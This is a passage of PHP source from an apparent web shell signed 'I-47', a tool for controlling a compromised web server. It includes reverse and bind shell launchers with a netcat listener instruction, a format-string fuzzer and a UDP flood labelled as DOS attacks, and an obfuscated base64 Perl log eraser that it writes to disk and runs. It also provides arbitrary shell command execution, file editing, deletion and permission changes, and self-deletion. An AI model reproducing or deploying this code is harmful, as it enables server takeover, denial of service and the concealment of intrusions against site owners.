3594. <th colspan="1" width="50px">Reverse Shell</th>
3595. <th colspan="1" width="50px">Bind Shell</th>
3596. </tr>
3597. <tr>
3598. <form action='<?php echo $self; ?>?connect' method='post' >
3599. <td>
3600. <table style="border-spacing: 6px;">
3601. <tr>
3602. <td>IP </td>
3603. <td>
3604. <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3605. </td>
3606. </tr>
3607. <tr>
3608. <td>Port </td>
3609. <td><input style="width: 200px;" class="box" name="port" size='5' value="21"/></td>
3610. </tr>
3611. <tr>
3612. <td style="vertical-align:top;">Use:</td>
3613. <td><select style="width: 95px;" name="lang" class="sbox">
3614. <option value="perl">Perl</option>
3615. <option value="c">C</option>
3616. <option value="php">PHP</option>
3617. </select>&nbsp;&nbsp;
3618. <input style="width: 90px;" class="but" type="submit" value="Connect!"/></td>
3619.  
3620. </tr>
3621. </table>
3622. </td>
3623. </form>
3624. <form action='<?php echo $self; ?>?connect' method='post' >
3625. <td style="vertical-align:top;">
3626. <table style="border-spacing: 6px;">
3627. <tr>
3628. <td>Port</td>
3629. <td>
3630. <input style="width: 200px;" class="box" name="port" value="21" />
3631. </td>
3632. </tr>
3633. <tr>
3634. <td>Password </td>
3635. <td>
3636. <input style="width: 200px;" class="box" name="passwd" value="I-47"/>
3637. </td>
3638. <tr>
3639. <td>Using</td>
3640. <td>
3641. <select style="width: 95px;" name="lang" id="lang" class="sbox">
3642. <option value="perl">Perl</option>
3643. <option value="c">C</option>
3644. </select>&nbsp;&nbsp;
3645. <input style="width: 90px;" class="but" type="submit" value=" Bind "/></td>
3646. </tr>
3647. </table>
3648. </td>
3649. </form>
3650. </tr>
3651. </table>
3652. <div align="center"><font color="#FF0000" size="3">Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p 21"!</font></div>
3653. <p align="center"><font color="#FF0000" size="3">Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</font></p>
3654. <?php
3655. }
3656. }
3657.  
3658. //fuzzer
3659.  
3660. else if(isset($_GET['fuzz']))
3661. {
3662. if(isset($_GET['ip']) &&
3663. isset($_GET['port']) &&
3664. isset($_GET['times']) &&
3665. isset($_GET['time']) &&
3666. isset($_GET['message']) &&
3667. isset($_GET['messageMultiplier']) &&
3668. $_GET['message'] != "" &&
3669. $_GET['time'] != "" &&
3670. $_GET['times'] != "" &&
3671. $_GET['port'] != "" &&
3672. $_GET['ip'] != "" &&
3673. $_GET['messageMultiplier'] != ""
3674. )
3675. {
3676. $IP=$_GET['ip'];
3677. $port=$_GET['port'];
3678. $times = $_GET['times'];
3679. $timeout = $_GET['time'];
3680. $send = 0;
3681. $ending = "";
3682. $multiplier = $_GET['messageMultiplier'];
3683. $data = "";
3684. $mode="tcp";
3685. $data .= "GET /";
3686. $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
3687. if($_GET['type'] == "tcp")
3688. {
3689. $mode = "tcp";
3690. }
3691. while($multiplier--)
3692. {
3693. $data .= urlencode($_GET['message']);
3694. }
3695. $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
3696. $data .= "by-I-47".$ending;
3697. $length = strlen($data);
3698.  
3699.  
3700. echo "Sending Data :- <br /> <p align='center'>$data</p>";
3701.  
3702. print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
3703. for($i=0;$i<$times;$i++)
3704. {
3705. $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
3706. if($socket)
3707. {
3708. fwrite($socket , $data , $length );
3709. fclose($socket);
3710. }
3711. }
3712. echo "<script>alert('Fuzzing Completed!');</script>";
3713. echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
3714. echo "Total Number of Packets Sent : " . $times . "<br />";
3715. echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
3716. echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
3717. }
3718. else
3719. {
3720. ?>
3721. <form method="GET">
3722. <input type="hidden" name="fuzz" />
3723. <table id="margins">
3724. <tr>
3725. <td width="400" class="title">
3726. IP
3727. </td>
3728. <td>
3729. <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3730. </td>
3731. </tr>
3732.  
3733. <tr>
3734. <td class="title">
3735. Port
3736. </td>
3737. <td>
3738. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3739. </td>
3740. </tr>
3741.  
3742. <tr>
3743. <td class="title">
3744. Timeout
3745. </td>
3746. <td>
3747. <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3748. </td>
3749. </tr>
3750.  
3751.  
3752. <tr>
3753. <td class="title">
3754. No of times
3755. </td>
3756. <td>
3757. <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3758. </td>
3759. </tr>
3760.  
3761. <tr>
3762. <td class="title">
3763. Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
3764. </td>
3765. <td>
3766. <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3767. </td>
3768. <td>
3769. x
3770. </td>
3771. <td width="20">
3772. <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3773. </td>
3774. </tr>
3775.  
3776. <tr>
3777. <td rowspan="2">
3778. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value=" Submit "/>
3779. </td>
3780. </tr>
3781. </table>
3782. </form>
3783. <?php
3784. }
3785. }
3786.  
3787.  
3788. //DDos
3789.  
3790. else if(isset($_GET['dos']))
3791. {
3792. if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
3793. $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
3794. {
3795. $IP=$_GET['ip'];
3796. $port=$_GET['port'];
3797. $executionTime = $_GET['exTime'];
3798. $noOfBytes = $_GET['noOfBytes'];
3799. $data = "";
3800. $timeout = $_GET['timeout'];
3801. $packets = 0;
3802. $counter = $noOfBytes;
3803. $maxTime = time() + $executionTime;;
3804. while($counter--)
3805. {
3806. $data .= "X";
3807. }
3808. $data .= " I-47";
3809. print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
3810.  
3811. while(1)
3812. {
3813. $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
3814. if($socket)
3815. {
3816. fwrite($socket , $data);
3817. fclose($socket);
3818. $packets++;
3819. }
3820. if(time() >= $maxTime)
3821. {
3822. break;
3823. }
3824. }
3825. echo "<script>alert('Dos Completed!');</script>";
3826. echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
3827. echo "Total Number of Packets Sent : " . $packets . "<br />";
3828. echo "Total Data Sent = ". HumanReadableFilesize($packets*$noOfBytes) . "<br />";
3829. echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
3830. }
3831. else
3832. {
3833. ?>
3834. <form method="GET">
3835. <input type="hidden" name="dos" />
3836. <table id="margins">
3837. <tr>
3838. <td width="400" class="title">
3839. IP
3840. </td>
3841. <td>
3842. <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3843. </td>
3844. </tr>
3845.  
3846. <tr>
3847. <td class="title">
3848. Port
3849. </td>
3850. <td>
3851. <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3852. </td>
3853. </tr>
3854.  
3855. <tr>
3856. <td class="title">
3857. Timeout <font color="red">(Time in seconds)</font>
3858. </td>
3859. <td>
3860. <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3861. </td>
3862. </tr>
3863.  
3864.  
3865. <tr>
3866. <td class="title">
3867. Execution Time <font color="red">(Time in seconds)</font>
3868. </td>
3869. <td>
3870. <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3871. </td>
3872. </tr>
3873.  
3874. <tr>
3875. <td class="title">
3876. No of Bytes per/packet
3877. </td>
3878. <td>
3879. <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3880. </td>
3881. </tr>
3882.  
3883.  
3884. <tr>
3885. <td rowspan="2">
3886. <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value=" Attack >> "/>
3887. </td>
3888. </tr>
3889. </table>
3890. </form>
3891. <?php
3892. }
3893. }
3894.  
3895. // Sec info
3896. else if(isset($_GET['secinfo']))
3897. { ?>
3898. <br><br><center><font color =red size=5>Server security information</font><br><br></center>
3899. <table style="width:100%;" border="1">
3900. <tr>
3901. <td style="width:7%;">Curl</td>
3902. <td style="width:7%;">Oracle</td>
3903. <td style="width:7%;">MySQL</td>
3904. <td style="width:7%;">MSSQL</td>
3905. <td style="width:7%;">PostgreSQL</td>
3906. <td style="width:12%;">Open Base Directory</td>
3907. <td style="width:10%;">Safe_Exec_Dir</td>
3908. <td style="width:7%;">PHP Version</td>
3909. <td style="width:7%;">Server Admin</td>
3910. </tr>
3911. <tr>
3912. <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3913. <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3914. <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3915. <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3916. <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3917. <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3918. <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3919. <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3920. <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3921. </tr>
3922. </table><br> <?php
3923. mysecinfo();
3924. }
3925.  
3926.  
3927. else if(isset($_GET['perms']))
3928. {
3929. ?>
3930. <form method="POST" action="<?php echo $self; ?>" >
3931. <input type="hidden" name="myfilename" value="<?php echo $_GET['file']; ?>">
3932. <table align="center" border="1" style="width:40%;">
3933. <tr>
3934. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
3935. </tr>
3936. <tr>
3937. <td colspan="2" align="center" style="height:60px">
3938. <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changeperms"/></td>
3939. </tr>
3940. </table>
3941.  
3942. </form>
3943. <?php
3944. }
3945.  
3946. else if(isset($_GET['rename']))
3947. {
3948. ?>
3949. <form method="GET" action="<?php echo $self; ?>" >
3950. <input type="hidden" name="getdir" value="<?php echo $_GET['getdir']; ?>">
3951. <table>
3952. <tr>
3953. <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="file" class="box" /></td>
3954. </tr>
3955. <tr>
3956. <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename'];?>" name="to" class="box" /></td>
3957. </tr>
3958. </table>
3959. <br>
3960. <input type="Submit" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
3961. </form>
3962. <?php
3963.  
3964. }
3965. else if(isset($_GET['open']))
3966. {
3967. ?>
3968. <form method="POST" action="<?php echo $self;?>"\>
3969. <table>
3970. <tr>
3971. <td>File </td><td> : </td><td><input value="<?php echo $_GET['open'];?>" class="box" name="file" /></td>
3972. </tr>
3973. <tr>
3974. <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']);?>" class="box" /></td>
3975. </tr>
3976. </table>
3977. <textarea name="content" rows="20" cols="100" class="box"><?php
3978. $content = htmlspecialchars(file_get_contents($_GET['open']));
3979. if($content)
3980. {
3981. echo $content;
3982. }
3983. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3984. {
3985. fopen($_GET['open']);
3986. while(!feof())
3987. {
3988. echo htmlspecialchars(fgets($_GET['open']));
3989. }
3990. }
3991.  
3992. ?>
3993. </textarea><br />
3994. <input name="save" type="Submit" value="Save Changes" id="spacing" class="but"/>
3995. </form>
3996. <?php
3997. }
3998.  
3999. else if(isset($_POST['file']) &&
4000. isset($_POST['content']) )
4001. {
4002. if(is_dir($_POST['file']))
4003. {
4004. header("location:".$self."?dir=".$_POST['file']);
4005. }
4006. if(file_exists($_POST['file']))
4007. {
4008. $handle = fopen($_POST['file'],"w");
4009. fwrite($handle,$_POST['content']);
4010. header("Location:$self");
4011. }
4012. else
4013. {
4014. echo "<p class='alert'>File Name Specified does not exists!</p>";
4015. }
4016. }
4017.  
4018. else if(isset($_GET['selfkill']))
4019. {
4020. unlink(__FILE__);
4021. echo "<br><center><font color=lime size=5>Good Bye......</font></center>";
4022. }
4023.  
4024. else if(isset($_POST['executecmd']))
4025. {
4026. if($_POST['mycmd']=="logeraser")
4027. {echo "gfhfgh";
4028. $erase = gzinflate(base64_decode("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"));
4029. if(is_writable("."))
4030. {
4031. if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
4032. {
4033. fwrite($openp, $erase);
4034. fclose($openp);
4035. passthru("perl logseraser.pl linux");
4036. unlink("logseraser.pl");
4037. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4038. }
4039. } else
4040. {
4041. if($openp = fopen("/tmp/logseraser.pl", 'w'))
4042. {
4043. fwrite($openp, $erase)or die("Error");
4044. fclose($openp);
4045. $aidx = passthru("perl logseraser.pl linux");
4046. unlink("logseraser.pl");
4047. echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
4048. }
4049. }
4050. }
4051. else
4052. {
4053. $check = shell_exec($_POST['mycmd']);
4054. echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
4055. }
4056. }
4057.  
4058. else if(isset($_POST['changefileperms']))
4059. {
4060. if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4061. {
4062. $actbox = $_POST["actbox3"];
4063. foreach ($actbox as $v)
4064. {
4065. $perms = 0;
4066. for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4067. $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4068. echo "<center><div align=left style=width:60%;>";
4069. if(@chmod($v,$perms))
4070. echo "<blink><font size=3 color=lime>File $v Permissions Changed Successfully</font></blink>";
4071. else
4072. echo "<blink><font size=3 color=red>Cannot Change $v File Permissions</font></blink>";
4073. echo "</div></center>";
4074. }
4075.  
4076. }
4077. }
4078. else if(isset($_POST['choice']))
4079. {
4080. if($_POST['choice'] == "chmod")
4081. { ?>
4082. <form method="POST" ><?php
4083. $actbox1 = $_POST['actbox'];
4084. foreach ($actbox1 as $v)
4085. { ?>
4086. <input type="hidden" name="actbox3[]" value="<?php echo $v; ?>">
4087. <?php }
4088. ?>
4089. <table align="center" border="1" style="width:40%;">
4090. <tr>
4091. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4092. </tr>
4093. <tr>
4094. <td colspan="2" align="center" style="height:60px">
4095. <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changefileperms"/></td>
4096. </tr>
4097. </table>
4098.  
4099. </form> <?php
4100. }
4101. else if($_POST['choice'] == "delete")
4102. {
4103. $actbox = $_POST["actbox"];
4104. foreach ($actbox as $v)
4105. {
4106. if(is_file($v))
4107. {
4108. if(unlink($v))
4109. {
4110. echo "<br><center><font color=lime size=3>File $v Deleted Successfully</font></center>";
4111. }
4112. else
4113. echo "<br><center><font color=red size=3>Cannot Delete File $v</font></center>";
4114. }
4115. else if(is_dir($v))
4116. {
4117. rrmdir($v);
4118. $loc = $_SERVER['REQUEST_URI'];
4119. header("Location:$loc");
4120. ob_end_flush();
4121. }
4122. }
4123. }
4124. else if($_POST['choice'] == "compre")
4125. {
4126. $actbox = $_POST["actbox"];
4127. foreach ($actbox as $v)
4128. {
4129. if(is_file($v))
4130. {
4131. $zip = new ZipArchive();
4132. $filename= basename($v) . '.zip';
4133. if(($zip->open($filename, ZipArchive::CREATE))!==true)
4134. { echo '<br><font color=red size=3>Error: Unable to create zip file for $v</font>';}
4135. else {echo "<br><font color=lime size=3>File $v Compressed successfully</font>";}
4136. $zip->addFile(basename($v));
4137. $zip->close();
4138. }
4139. else if(is_dir($v))
4140. {
4141. if($os == "Linux")
4142. {
4143. $filename= basename($v);
4144. execmd("tar --create --recursion --file=$filename.tar $v");
4145. echo "<br><font color=lime size=3>File $v Compressed successfully as $v.tar</font>";
4146. }
4147. }
4148. }
4149. }
4150. else if($_POST['choice'] == "uncompre")
4151. {
4152. $actbox = $_POST["actbox"];
4153. foreach ($actbox as $v)
4154. {
4155. $zip = new ZipArchive;
4156. $filename= basename($v);
4157. $res = $zip->open($filename);
4158. if ($res === TRUE)
4159. {
4160. $pieces = explode(".",$filename);
4161. $zip->extractTo($pieces[0]);
4162. $zip->close();
4163. echo "<br><font color=lime size=3>File $v Unzipped successfully</font>";
4164. } else {
4165. echo "<br><font color=red size=3>Error: Unable to Unzip file $v</font>";
4166. }
4167. }
4168. }
4169. }
4170.  
4171. else if(isset($_POST['execute']))
4172. {
4173. $comm = $_POST['execute'];
4174. chdir($_POST['executepath']);
4175. $check = shell_exec($comm);
4176.  
4177. echo "<textarea cols=120 rows=20 class=box>" . $check . "</textarea>";
4178.  
4179. ?>
4180. <BR><BR><center><form action="<?php $self; ?>" method="post">
4181. <input type="hidden" name="executepath" value="<?php echo $_POST['executepath']; ?>" />
4182. <input type="text" class="box" name="execute">
4183. <input type="submit" value="Execute" class="but"></form></center>
4184. <?php
4185. }
4186.  
4187. else if(isset($_POST['Create']))
4188. {
4189. ?>
4190. <form method="post">
4191.  
4192. <input type="hidden" name="filecreator" value="<?php echo $_POST['createfile']; ?>">
4193. <textarea name="filecontent" rows="20" cols="100" class="box"></textarea><br />
4194. <input name="createmyfile" type="Submit" value=" Save " id="spacing" class="but"/>
4195. </form>
4196.  
4197. <?php }
4198.  
4199. else
4200. {
4201.  
4202. $mydir = basename(dirname(__FILE__));
4203. $pdir = str_replace($mydir,"",$dir);
4204. $pdir = str_replace("/","",$dir);
4205.  
4206. $files = array();
4207. $dirs = array();
4208.  
4209. $odir=opendir($dir);
4210. while($file = readdir($odir))
4211. {
4212. if(is_dir($dir.'/'.$file))
4213. {
4214. $dirs[]=$file;
4215. }
4216. else
4217. {
4218. $files[]=$file;
4219. }
4220. }
4221. $countfiles = count($dirs) + count($files);
4222. $dircount = count($dirs);
4223. $dircount = $dircount-2;
4224. ?>
4225. <table style="width:95%;" align="center" cellpadding="3">
4226. <tr style="background-color:#161616;"><td colspan="7" align="center"><font color="red" size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
4227. <tr style="background-color:#161616; height:12px;">
4228. <th style="width:53%;">Name</th>
4229. <th style="width:7%;">Size</th>
4230. <th style="width:9%;">Permissions</th>
4231. <th style="width:12%;">Modification Date</th>
4232. <th style="width:6%;">Rename</th>
4233. <th style="width:7%;">Download</th>
4234. <th style="width:3%;">Action</th>
4235. </tr>
4236.  
4237. <?php
4238.  
4239. if(isset($_GET['download']))
4240. {
4241. download();
4242. }
4243. ?>
4244. <form method="post" id="myform" name="myform">
4245. <?php
4246. $dir = getcwd();
4247. if(isset($_GET['dir']))
4248. {
4249. $dir = base64_decode($_GET['dir']);
4250. }
4251. $i = 0;
4252. if(is_dir($dir))
4253. {
4254. if($countfiles == 2)
4255. echo "<tr><td colspan=5><center><font color=red size=3>No files or directory present or Cannot view files and directory</font></center></td></tr>";
4256. foreach($dirs as $val)
4257. {
4258. $i++;
4259. ?>
4260. <font color="#999999">
4261.  
4262. <?php if($val == ".") continue; else if($val=="..") { $val = Trail($dir . $directorysperator . $val,$directorysperator); ?>
4263. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'"><td class='info'><a href='<?php echo $self . "?dir=".$val; ?>'><font class=txt>[ .. ]</font></a></td><td>UPDIR</td>
4264. <td><?php if(is_writable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($val);?></font></a><?php } else if(is_readable($val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($val);?></font><?php } ?></td>
4265.  
4266. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
4267. <td></td><td></td><td></td></</tr><?php continue; } ?>
4268. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4269. <td class='dir'><a href='<?php echo $self ?>?dir=<?php echo $dir . $directorysperator . $val; ?>'>[ <?php echo $val; ?> ]</a></td>
4270. <td class='info'>DIR</td>
4271. <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
4272. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4273. <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
4274. <td></td>
4275. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
4276. </tr></font>
4277. <?php
4278. }
4279. foreach($files as $val)
4280. {
4281. $i++;
4282. ?>
4283. <tr style="background-color:#161616;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#161616'">
4284. <td class='file'><a href='<?php echo $self ?>?open=<?php echo $dir . $directorysperator . $val; ?>'><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a></td>
4285. <td class='info'><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></td>
4286. <td class='info'><?php if(is_writable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#00CC00"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else if(is_readable($dir . $directorysperator . $val)) { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FF0000"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font></a><?php } else { ?><a href="<?php echo $self; ?>?perms&file=<?php echo $dir . $directorysperator . $val; ?>"><font color="#FFFFFF"><?php echo getFilePermissions($dir . $directorysperator . $val);?></font><?php } ?></td>
4287. <td><font size="3" color="lime"><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
4288. <td class="info"><a href="<?php echo $self;?>?getdir=<?php echo $dir; ?>&rename=<?php echo $dir . $directorysperator . $val;?>">Rename</a></td>
4289. <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>">Download</a>
4290. <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
4291. </tr>
4292. <p>
4293. <?php
4294. }
4295. }
4296. else
4297. {
4298. echo "<p><font color=red size=4>".base64_decode($_GET['dir'])." is <b>NOT</b> a Valid Directory!<br /></font></p>";
4299. }
4300.  
4301. echo "</table>
4302. <div align='right' style='width:97%;'><BR><input type='checkbox' name='checkall' onclick='checkedAll();'> <font color=lime size=3>Check All </font> &nbsp;
4303. <select class=sbox name=choice style='width: 100px;'>
4304. <option value=delete>Delete</option>
4305. <option value=chmod>Change mode</option>
4306. if(class_exists('ZipArchive'))
4307. { <option value=compre>Compress</option>
4308. <option value=uncompre>Uncompress</option> }
4309. </select>
4310.  
4311. <input type=submit value=Submit name=checkoption class=but></form></div>";
4312. }
4313.  
4314. ?>
4315. </p>
4316. <table style="width:100%;" border="1">
4317. <tr>
4318. <td align="center">
4319. <form method="post" enctype="multipart/form-data">
4320.  
